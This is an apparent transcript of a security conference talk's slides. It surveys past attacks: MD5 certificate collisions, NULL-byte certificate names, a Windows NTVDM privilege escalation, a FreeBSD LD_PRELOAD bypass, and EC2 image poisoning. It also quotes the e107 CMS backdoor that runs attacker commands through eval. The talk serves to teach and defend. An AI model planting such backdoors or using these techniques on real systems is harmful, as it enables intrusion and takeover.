1 / 53

Attacks and defences Or, really cool hacks

Attacks and defences Or, really cool hacks. marco@sensepost.com. About Us. pta.za company +- 20 ppl Pen-testing for a living VMS training www.sensepost.com marco@sensepost.com. Why this talk?. Explain a little about recent attacks Promote security

britain
Download Presentation

Attacks and defences Or, really cool hacks

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Attacks and defencesOr, really cool hacks • marco@sensepost.com

  2. About Us • pta.za company • +- 20 ppl • Pen-testing for a living • VMS • training • www.sensepost.com • marco@sensepost.com

  3. Why this talk? • Explain a little about recent attacks • Promote security • FLOSS angle? hmmm. FLOSS also insecure? • ZaCon (but only at the end, I promise)

  4. x509 and MD5

  5. x509 attack: MD5 • Security of system rests in the certificate signature • Security of signature lies in the hashing algorithm • (Aside: hash function == one-way function that produces fixed size output. MD5, SHA1, RIPE-MD etc) • If two certificates hash to the same value, then their signatures will be the same

  6. x509 attack: MD5 • Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger • Figured out a way to create two colliding certificates • Then found CAs issuing certs with MD5, with predictable sequence numbers

  7. x509 attack: MD5 • Attack was: • Predict sequence number by purchasing a cert, +1000 • Predict validity times • Create two colliding certificates, one legit and the other evil. Legit cert assumes fixed seq # and validity. • Submit CSR for legit cert • Holds thumbs on the timing/sequence number • Cut-n-paste the signature onto the evil cert

  8. x509 attack: MD5 • Collision attack perform on cluster of 200 PS3 • Could perform 3 collisions in 72 hours • Cost them $600 in purchased certs • Earned a valid CA-cert

  9. x509 and the CN

  10. x509 attack: CN • Moxie Marlinspike loves SSL • He looked into how certs are issued and validated • CSRs use ASN.1 to serialise their data • Strings are prepended by their length • Most libraries (by extension browsers) use C functions to validate certs • Strings terminated by nulls

  11. x509 attack: CN • CN when evaluated in a CSR • CN as seen by a browser

  12. x509 attack: CN • CA’s verify the domain from the end • Browsers verify the domain from the front

  13. x509 attack: CN • No explicit ban on disallowed characters in the CN • How about sending a NULL byte in a CSR • www.cs.up.ac.za\0.sensepost.com • CA validates from the end, and if we’re the owner of sensepost.com, then we get back a cert • When victims receive the malicious cert, their libs validate from the beginning, halting at NULL

  14. Validating the cert • Checks performed by the library • Certificate is signed by trusted CA • Validity is fine • CN appears to match hostname • Great!

  15. PKI attacks: cert checking • Who was vulnerable? • All NSS-based app • Firefox • Thunderbird • ... • IE • Bunch of others (Pidgin, AIM, Outlook, Evolution, VPN clients, ...)

  16. PKI attacks: cert checking • More attacks including wildcard certs as well as remote buffer overflows • thoughtcrime.org

  17. Win32 ring3 -> ring0

  18. Win32: privilege escalation • Tavis Ormandy (Google) found a bug in how ‘iret’ was handled on NetBSD <-- he’s a UNIX guy • Poked around on Win32 • Found a related bug in the 8086 simluator on Win32 • Great example of long-standing bug (*) • Ridiculous exploit • Background...

  19. Win32: 8086 simulator • Win32 supports execution of real-mode code • Simulated environment • Simulated app is run by a monitor, which performs necessary sanity checks. Provides fake interrupt handlers. • In real-mode, apps get to change segment registers which they can’t in protected mode. • Monitor calls into NT kernel when needed, on behalf of the simulated app.

  20. Win32: exploit description • Spawn ‘cmd.exe’, grab handle • Spawn ‘debug.exe’, which inits the NTVDM subsystem incl monitor • Inject a DLL into the monitor • DLL creates a fake kernel stack • Creates a new VDM context • Inserts a forged trap frame on the real stack, that points to fake kernel stack • Executes code that gens a #GP trap handler on ‘iret’ • Handler aborts early, forged frame restored. Control passes to attacker supplied code. • Code searches for SYSTEM token and assigns it to the initial ‘cmd.exe’ • Code cleans up completely and returns • cmd.exe is now ‘SYSTEM’

  21. Win32 demo

  22. FreeBSD rtld

  23. FreeBSD: rtld • dynamic linking • environment variables • LD_PRELOAD • LD_PRELOAD=mylib.so ./myproggie • useful: substitute standard calls etc etc • will execute _init() from mylib.so before main() • what about suid programs? • gotta remove dangerous environmental variables like LD_PRELOAD

  24. FreeBSD: rtld code • if (suid) { • ... • unsetenv(“LD_PRELOAD”); • unsetenv(“LD_LIBMAP”); • ... • } • int unsetenv(const char *name){ • ... • if (__merge_environ() == -1) { • return -1; • ... • //unset env variable here • int __merge_environ(){ • ... • if (strchr(*env, ‘=’) == NULL) { • return -1; • ...

  25. FreeBSD: rtld • So, executing with a corrupted env means the unsetenv()s will be aborted early, and the linker didn’t check for this • One corrupted environment is: • { “moomoo”, “LD_PRELOAD=mylib.so” } • This skips unsetting of env, but loader will still load the lib • Now for the evilness...

  26. FreeBSD demo

  27. e107 Backdoor

  28. e107 Backdoor • Example of a real-world attack • Popular Open Source CMS • Large community / plugins /themes / blah blah • A blind SQL injection vuln reported in ver 0.7.15 (Nov 3, 2009) • On 25 Jan 2010, a mail appeared on FD

  29. e107: backdoor code • if(md5($_COOKIE['access-admin']) = "cf1afec15669cb96f09befb7d70f8bcb") • { • ... • if(!empty($_POST['cmd'])) • { • $out = execute($_POST['cmd']); • } • elseif(!empty($_POST['php'])){ • ob_start(); • eval($_POST['php']); • $out = ob_get_contents(); • ob_end_clean(); • } • ... • }

  30. e107 Backdoor • turns out they were owned through the SQLi bug • attackers replaced download link with a link to the backdoored code

  31. Let’s talk cloud computing • (it’s hot right now, isn’t it?)

  32. So, whatexactly *is*the cloud?

  33. What drives cloud adoption? • Management by in-flight magazine • Manager Version • Geek Version • Poor history from IT • Economy is down • Cost saving becomes more attractive • Cloud computing allows you to move from CAPEX to OPEX • (Private Clouds?)

  34. Problems with cloud testing • Transparency • Privacy • Compliance • Legal • Vendor Lock-in • Availability

  35. BlackHat talk summary • Attacked SugarSync, SalesForce, Amazon, MobileMe • Not enough time!!! • Amazon it is then...

  36. Yes, it’s that cool...

  37. Amazon EC2 • Elastic Compute Cloud • Provides Xen platform for running virtual machines • Easy (Web interface) • Auto-scales • Cheap • Login, pick VM, boot, go!

  38. Danger • Out of 2700 images, 47 are provided by Amazon • Are all secured equally? • Tested by scanning each VM with Nessus • 1293 Highs • 646 Criticals • Not good • Incompetence aside, what can we ascribe to malice?

  39. Can we get someone to run our machine? • Bundle an image • Register the image (Amazon assigns it an AMI-ID) • Wait for someone to run it • Profit! • Alas... our AMI-ID is too low! • Solution: • do { /*register stuff */ } while (ami-id > threshold)

  40. But there’s more • Our race promoted our strangely named image (qscan) • Let’s make it sexier • fedora - taken • fedora_core - taken • redhat - taken • fedora_core_11 - not taken!

  41. What other cloud hacks? • SugarSync password reset • ClickJacking against SalesForce • Porting Nikto into SalesForce • License stealing from Amazon • Image stealing from Amazon users • Found bugs in MobileMe • In a position to read Steve Wozniak’s mail :) • www.sensepost.com/blog

  42. Linux bugs (it’s TLUG)

More Related